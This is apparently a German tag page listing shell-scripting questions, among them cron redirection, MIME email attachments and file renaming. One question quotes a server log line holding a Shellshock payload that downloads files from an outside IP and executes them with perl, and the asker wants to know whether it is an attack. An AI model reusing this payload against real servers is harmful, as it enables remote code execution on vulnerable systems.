Tag: shell-script

Syntaxfehler bei unerwartetem Token `>' in Skript, das von cron ausgeführt wird

Anzahl der Antworten 1 Antworten
Ich schreibe ein Shell-Skript für Mac OS/Linux. Das Skript wird von einem Cron-Job ausgeführt. Ich versuche, stdout und stderr an eine Protokolldatei anzuhängen. Mein Befehl (vereinfacht) sieht wie folgt aus (Zeile 5 in myscript.sh): mycommand &>> log.txt

Wie kann ich eine E-Mail mit angehängter xls-Datei mithilfe eines Shell-Skripts als Mimetyp application/xls versenden, ohne dass die empfangene Datei unlesbar wird?

Anzahl der Antworten 2 Antworten
#!/bin/bash ATTACH1=file.xls SUBJECT="subj" FROM=me@domain.com TO=you@domain.com CC=them@domain.com MIME="Application/vnd.ms-excel" FILE=$ATTACH1 boundary="---my-unlikely-text-for-mime-boundary---$$--" (cat <<! From: $FROM To: $TO Subject: $SUBJECT Date: $(date +"%a, %b %e %Y %T %z") Mime-Version: 1.0 Content-Type: multipart/mixed; boundary="$boundary" This email has attached the file --$boundary

So finden Sie alle Null-Byte-Dateien im Verzeichnis

Anzahl der Antworten 3 Antworten
Wie finde ich alle Null-Byte-Dateien im Verzeichnis und sogar in Unterverzeichnissen? Ich habe das gemacht: #!/bin/bash lns=`vdir -R *.* $dir| awk '{print $8"\t"$5}'` temp="" for file in $lns ; do if test $file = "0" ;then printf

Schleife verlassen, wenn eine Taste gedrückt wird

Anzahl der Antworten 3 Antworten
Ich möchte das Skript beenden, wenn eine beliebige Taste gedrückt wird. #!/bin/sh while true; do df -h | head sleep 10 clear done Ein Vorschlag? OriginalAutor BOUABANE Raed | 2018-06-28

Ich versuche, einen Patch in ein Bash-Skript einzubetten - kann Patch nicht dazu bringen, den Patch aus einer Variablen zu lesen

Anzahl der Antworten 1 Antworten
read -d '' PATCH_OS <<EOF //PATCH//TEXT// EOF patch -b < ${PATCH_OS} Dies schlägt fehl: ./script.sh: line 39: --- //PATCH//TEXT// (Zeile 39 ist "patch -b < ${PATCH_OS}"") OriginalAutor fg76d76 | 2015-01-10

du (Festplattennutzung) Ergebnis an eine numerische Variable übergeben

Anzahl der Antworten 1 Antworten
In einem Shell-Skript suche ich nach einer Möglichkeit, das du-Ergebnis (Festplattennutzung) an eine numerische Variable zu übergeben, damit ich die Ausführung eines Shell-Skripts an die Größe eines bestimmten Ordners binden kann. Ich habe etwas wie size=$(du -sh

Ist dies ein Angriff oder etwas, worüber man sich Sorgen machen muss? Shellshock?

Anzahl der Antworten 3 Antworten
Sah dies in der access.log auf meinem Testserver : > 173.45.100.18 - - [26/Sep/2014:07:09:53 +0200] "GET /cgi-bin/hi HTTP/1.0" 404 490 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget > http://213.5.67.223/ji;curl -O /tmp/ji http://213.5.67.223/jurat ; > perl /tmp/ji;rm

Wie bringt man Ubuntu dazu, jedes Mal, wenn der Bildschirm entsperrt wird, automatisch ein Programm zu starten?

Anzahl der Antworten 3 Antworten
Ich habe ein Skript, das ich gerne jedes Mal automatisch aufrufen lassen würde, wenn der Bildschirm entsperrt wird. Bietet Ubuntu irgendeine Unterstützung für Benutzer, die dies tun möchten? Mir ist nichts bekannt. Ich vermute, Sie müssten Ihre

Bash-Skript: alle Dateien unterhalb eines Verzeichnisses umbenennen?

Anzahl der Antworten 2 Antworten
Hier ist, was ich in Pseudocode tun möchte: for subdir in [all first-level subdirectories of the current directory]: for file in [all files in subdir]: rename file to "myprefix_" + current_filename_padded_with_zeroes Was ich mit current_filename_padded_with_zeroes meine, ist

Der "andere" Finger (GECOS-Felder in /etc/passwd)

Anzahl der Antworten 2 Antworten
in der Datei /etc/passwd haben wir das sogenannte GECOS fields (was für "General Electric Comprehensive Operating System" steht), das heißt: username:password:userid:groupid:gecos:home-dir:shell Where GECOS sind unterteilt als: :FullName,RoomAddress,WorkPhone,HomePhone,Others: And Others sind in beliebig viele Kommas unterteilt: :FullName,RoomAddress,WorkPhone,HomePhone,Other1,Other2,Other3: In